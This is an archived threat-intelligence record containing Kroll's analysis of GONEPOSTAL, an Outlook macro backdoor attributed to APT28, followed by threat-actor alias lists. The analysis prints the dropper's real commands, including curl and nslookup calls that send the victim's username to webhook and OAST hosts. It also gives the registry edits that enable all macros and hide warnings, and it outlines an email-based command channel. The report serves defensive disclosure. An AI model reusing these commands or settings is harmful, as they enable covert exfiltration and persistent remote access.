{
	"id": "d02cb389-02db-47fa-b773-3cdf03d5bd95",
	"created_at": "2026-04-06T02:11:59.288808Z",
	"updated_at": "2026-04-10T03:37:50.274808Z",
	"deleted_at": null,
	"sha1_hash": "b4fdffe847ff946ff299b3aad4ed91d799040113",
	"title": "FANCY BEAR GONEPOSTAL – Espionage Tool Provides Backdoor Access to Microsoft Outlook",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10153037,
	"plain_text": "FANCY BEAR GONEPOSTAL – Espionage Tool Provides\r\nBackdoor Access to Microsoft Outlook\r\nPublished: 2025-09-05 · Archived: 2026-04-06 01:37:07 UTC\r\nThis article has been authored by Marc Messer, Dave Truman.\r\n \r\nKey Takeaways \r\nKroll has observed GONEPOSTAL malware used in an espionage campaign attributed to KTA007 (Fancy\r\nBear, APT28).\r\nThe malware consists of a dropper DLL and an obfuscated, password-protected VbaProject.OTM file,\r\nwhich houses macros written for Microsoft Outlook.\r\nThe malicious macros add backdoor functionality to Outlook, enabling email communication for\r\nCommand and Control (C2).\r\nKTA007, also known as Fancy Bear, APT28, and Pawn Storm, is a state-sponsored political and economic\r\nespionage group associated with the Russian Military’s Main Intelligence Directorate (GRU) Unit 26165. The\r\ngroup has been implicated in several high-profile cyberattacks such as the 2016 Democratic National Committee\r\nbreach, the International Olympic Committee, the Norwegian Parliament and others. They are known to utilize\r\ntechniques and tools ranging from zero-day exploitation and spear phishing to a mixture of commercial and custom\r\nmalware.\r\nFollowing the initial report of an intrusion, files provided to Kroll analysts included two Dynamic Link Library\r\n(DLL) files, which tend to contain code, resources or data which can be used by multiple programs. These files\r\ninclude: \r\nSSPICLI.dll\r\nSSPICLI.dll is an unsigned malicious DLL pretending to be Microsoft’s legitimate signed DLL of the same\r\nname, which supplies security support provider interfaces for tasks such as authentication. 
The legitimate DLL was\r\nsupplied alongside, with a new name of tmp7EC9.dll.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 1 of 20\n\nFigure 1 - Malicious and legitimate DLL code signature checks (Source: Kroll).\r\nThe malicious DLL uses its export table to forward all 105 exported library functions of the legitimate DLL to the\r\nrenamed DLL supplied alongside, allowing any application using the malicious DLL to appear to work normally.\r\nFigure 2 - Functions forwarded from malicious DLL to renamed legitimate DLL\r\nThe malicious code of the DLL exists as two key C++ functions executed from the DLLMain execution path. The\r\nfirst function is the DLLMain function itself.\r\nThe DLLMain function starts by defining several C++ strings that contain the parameters to execute an encoded\r\nPowerShell command.\r\nFigure 3 – DLLMain creating PowerShell command lines and passing them to the execution function (Source: Kroll)\r\nThese parameters are passed to the second key function, whose purpose is to spawn PowerShell to run those\r\ncommands.\r\nThe execute-PowerShell function converts the C++ string parameter to a C++ wstring (wide string) and then\r\nprepends “powershell” to the beginning of the wstring, creating a full PowerShell command line, which is then\r\npassed to the “CreateProcessW” Windows API function to execute the command. 
Of note here is the\r\ndwCreationFlags value of 0x8000000, which stops the creation of an application window.\r\nFigure 4 – PowerShell command execution function (Source: Kroll)\r\nThe four commands being run fall into two sets of functionality. The first command copies a file\r\nnamed “testtemp.ini” into the Outlook profile directory, one stage of enabling the actor’s macros to run on Outlook\r\nstartup.\r\n$a=$env:APPDATA;copy testtemp.ini \"$a\\Microsoft\\Outlook\\VbaProject.OTM\"\r\nThe other three commands appear to be redundant mechanisms to allow the attacker to obtain the username, and\r\nsometimes the IP address, of successfully compromised victims. Once the actor has the username, they can work\r\nout the email address to send the C2 emails to.\r\nnslookup \"$env:USERNAME.8bf50371-5f9f-4d45-9320-922b068ebc2e.dnshook.site\"\r\ncmd /c curl \"https[:]//webhook[.]site/8bf50371-5f9f-4d45-9320-922b068ebc2e?$env:USERNAME\" -k\r\nnslookup \"$env:USERNAME.wcyjpnuxotpaebuijrtn3urwx1zeg223v.oast.fun\"\r\nThe first two requests utilize a free service designed for web application developers and testers and provide two\r\nmethods of logging the details: via a standard HTTP request with the username as a query parameter (this method\r\nalso gives the actor the IP address of the victim), and via a DNS request where the user’s name is added as the\r\nhostname component of the fully qualified domain name (FQDN). 
The second method provides a useful backup\r\nshould the HTTP request be blocked by an organization’s security tools such as reputation-based proxies.\r\nFigure 5 – Example of control panel for webhook.site showing tracking information (Source: Kroll) \r\nThe final DNS request, which also features the USERNAME in the hostname component of the FQDN, uses a\r\ndomain associated with tracking for pen testing tools, particularly used by vulnerability scanners to prove that an\r\nexploit worked when the relevant DNS lookup is made. \r\nOnce the four commands have completed, control then returns to the DLLMain function. \r\nThe second half of the DLLMain function centers on setting Windows registry values.\r\nFigure 6 – Windows registry modifications in DLLMain (Source: Kroll) \r\nThe code sets three Windows registry values: LoadMacroProviderOnBoot, Level, and PONT_STRING. \r\n \r\nLoadMacroProviderOnBoot \r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\LoadMacroProviderOnBoot = 1 \r\nThis registry setting enables loading of macro providers on Outlook application start. \r\nLevel\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Security\\level = 1 \r\nThis setting allows all macros and corresponds to the “enable all macros” option of “macro settings”.\r\nFigure 7 – Corresponding option to “Level” registry key (Source: Kroll) \r\nPONT_STRING \r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Options\\General\\PONT_STRING = \"32,\" \r\nThis registry value is a comma-separated list of dialog boxes which are suppressed and not shown, i.e. it\r\nkeeps track of dialog boxes for which the user ticked a “do not show this message again” type option. 
\r\nThe value of 32 maps to the dialog box that would normally warn the user of content being downloaded. By\r\nsetting this value the malware has stopped this dialog box being shown to the user.\r\nFigure 8 – Corresponding option to setting “32,” in “PONT” registry key (Source: Kroll) \r\n \r\nVbaProject.OTM \r\nVbaProject.OTM contains VBA macros which are executed by Microsoft Outlook, constituting a backdoor which\r\nKroll analysts have titled GONEPOSTAL. The VbaProject.OTM file at first glance is password protected. While\r\nthis does not fully encrypt the code in a typical manner, it does result in many products requiring a password to\r\nview the file upon opening. This can be bypassed in many cases using a hex or text editor; however, the logic of\r\nthe file remains difficult to evaluate as many strings and symbols are scrambled:\r\nFigure 9 – Initialization function, unedited (Source: Kroll) \r\nHowever, since symbols and variable names are reused throughout the code, observing execution and surrounding\r\nlogic allows for the macro file to be reconstructed to a format which is more easily parsed by humans.\r\nFigure 10 – Initialization function, edited (Source: Kroll) \r\nConfiguration detail strings are base64-encoded; however, they are interpreted from an offset. In simple terms, this means that\r\nreverting the base64 payloads requires removing the first few characters to reach that offset, with the remaining\r\ncharacters cleanly reverting to plaintext.  \r\nGONEPOSTAL is loaded into Microsoft Outlook via enabling of the registry setting\r\n“LoadMacroProviderOnBoot”, which enables the automatic loading of VBA from the VbaProject.OTM file. 
This\r\nresults in a backdoor utilizing the email service itself as a C2 channel.  \r\nAt a high level, here is how the Outlook macro backdoor behaves: \r\nStartup\r\nApplication_MAPILogonComplete() triggers on Outlook startup. \r\nInit() is called to decode configuration strings, set up directories and prepare payloads. \r\nEmail Monitoring\r\nApplication_NewMailEx() listens for new emails.\r\nEach email is passed to HandleMailItem().\r\nCommand Detection and Parsing \r\nHandleMailItem() checks for known command signatures.\r\nIf found, ProcessMailPayload() decodes and stores the payload.\r\nCommand Execution \r\nFinalizeMailItem() dispatches commands via DispatchPayloadCommand(): \r\ncmd -\u003e ExecuteShellCommand() -\u003e captures output -\u003e WriteByteChunksToFiles() \r\ncmdNo -\u003e TryExecuteCommand() (no output)\r\nupload -\u003e HandleUploadCommand() -\u003e writes file to disk\r\ndownload -\u003e HandleDownloadCommand() -\u003e reads file, chunks it \r\nExfiltration \r\nExecutePayload() creates and sends an Outlook email to the attacker.\r\nEncodes data in the body and attaches files.\r\nCleanup\r\nDeleteMailAndMatchInDeleted() removes processed emails from the inbox and deleted items.\r\nStartup begins at MAPI login, which is when Outlook has access to the messaging application programming\r\ninterface. 
Init() then begins to parse configuration details such as the C2 email address, some C2 command types and command\r\narrays, and file types, which are decoded from their initial configuration.\r\nFigure 11 – Initialized command keywords (Source: Kroll)\r\nFigure 12 – Initialized file extensions (Source: Kroll)\r\nFollowing this, Application_NewMailEx() waits for new emails. When new emails arrive, they are added to a\r\ndictionary list of mail items and parsed by HandleMailItem(). Essentially, as emails arrive, they are added to a\r\nqueue, and within this queue they are sub-sorted to establish if they contain C2 instructions.\r\nFigure 13 – Mail listening function (Source: Kroll)\r\nMail items are handled by skipping any non-delivery reports (NDRs) and any replies (Re:), and then checking for any\r\ncommands within the mail item. Based on this, emails are either removed from the queue, or C2 emails are\r\nidentified, commands processed and then the emails are deleted from both the inbox and the deleted items folder.\r\nProcessMailPayload() then extracts encoded data from the C2 and creates task items with them, returning the\r\ncommand results. 
The encoding is still base64 with a defined offset, similar to the configuration encoding in the\r\nInit() function.\r\nFigure 14 – C2 payload decoding (Source: Kroll) \r\nFurther error handling and string encoding/decoding takes place, and emails continue to be tabulated within their\r\ndictionary list. This takes place as a mixture of their generated Email ID numbers, the recipient address, the\r\nsubject and the decoded string of any C2 commands. Should errors occur, they are appended to the dictionary as\r\nwell.\r\nFigure 15 – Dictionary queue of mail to be handled (Source: Kroll)\r\nCommand execution has yet to occur; it is handled in the FinalizeMailItem() function. This iterates through the\r\ndictionary of mail items, passes the commands off to a dispatch function for execution and returns the results of\r\ntheir payloads.\r\nFigure 16 – Further mail handling (Source: Kroll) \r\nThe DispatchPayloadCommand() function is quite short and simple, utilizing the four major command types from\r\nearlier in the Init() function. Anything else is rejected, and the outcome logged to the dictionary.\r\nFigure 17 – Command dispatch (Source: Kroll) \r\nThe commands fall into two categories: file operations and command execution. The file operations are largely\r\nrelated to file chunking, either reconstructing a file from chunks or breaking a file down into chunks. This is so\r\nthat small files can be sent or received via the C2 as attachments, though these attachments would have to be\r\nrelatively small since they will be sent as emails. The functions do not actually upload or download anything\r\nthemselves, as that is handled by the sending of emails. 
They can be summarized as a group: \r\nWriteByteChunksToFiles: Splits a byte array into chunks and writes them to disk. \r\nWriteBytesToFile: Writes a byte array to a file.\r\nSliceByteArray: Extracts a portion of a byte array. \r\nCheckChunkFilesExist: Checks if chunk files already exist.\r\nGenerateUniqueFileMetadata: Generates a unique file name and extension. \r\nCreateFileMetadata: Combines base name and extension to form a file name. \r\nReencodeFileContent: Reads, encodes and rewrites a file with a header. \r\nResolveFilePath: Expands environment variables and resolves relative paths. \r\nFile transfer operations proceed as follows. First, files for egress are read and converted to\r\nbase64, with the original file deleted.\r\nFigure 18 – File encoding operations (Source: Kroll) \r\nFollowing this operation, files are split into byte chunks for transfer. This uses the same buffer setting seen earlier\r\nduring the Init() function, 3145728 bytes, approximately 3.15 megabytes. These byte chunks are then written to\r\nfiles for transfer via email.\r\nFigure 19 – Byte chunk operations (Source: Kroll)\r\nFor saving attachments from emails for file ingress, the same process is used in reverse. 
Files are saved, and then\r\nreverted from chunks to a larger file, and then converted from base64 into their original format.\r\nCommand execution is simpler: a PowerShell session is created and any commands sent are executed.\r\nThis can occur in two different ways: \r\ncmd -\u003e ExecuteShellCommand() -\u003e captures output -\u003e WriteByteChunksToFiles() \r\ncmdNo -\u003e TryExecuteCommand() (no output) \r\nWhile very similar, the first option (cmd) executes commands, saves the output and writes that output to a file for\r\nreturn to C2. The second option (cmdNo) just executes any commands passed to it and does not save nor return\r\nany output.\r\nFigure 20 – PowerShell command execution (Source: Kroll) \r\nAdditional code paths within the sample were also uncovered; however, they do not all appear to be fully used.\r\nThis may indicate that the backdoor continues to be under development, with additional features to be added.\r\nThe campaign is a good example of living-off-the-land, using common business tools and methods of\r\ncommunication for command and control. Interception of email communications and a platform for tool ingress\r\nover legitimate means enables a stealthy manner of access which could be difficult to detect. 
While Outlook-based\r\npersistence is not new, and has been observed before from KTA488 (aka APT32), GONEPOSTAL is not a\r\ncommonly seen tactic, and many may not have alerts tuned regarding behavior of the VbaProject.OTM files nor\r\nthe registry edits which enable the macros to be loaded from the OTM file at Outlook launch.\r\nFigure 21 – Flowchart of execution (Source: Kroll) \r\n \r\nGet in touch with Kroll’s CTI Team for further frontline information and explore how our team can help you stay\r\nahead of today’s threats.\r\nSource: https://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook"
	],
	"report_names": [
		"fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441519,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b4fdffe847ff946ff299b3aad4ed91d799040113.pdf",
		"text": "https://archive.orkl.eu/b4fdffe847ff946ff299b3aad4ed91d799040113.txt",
		"img": "https://archive.orkl.eu/b4fdffe847ff946ff299b3aad4ed91d799040113.jpg"
	}
}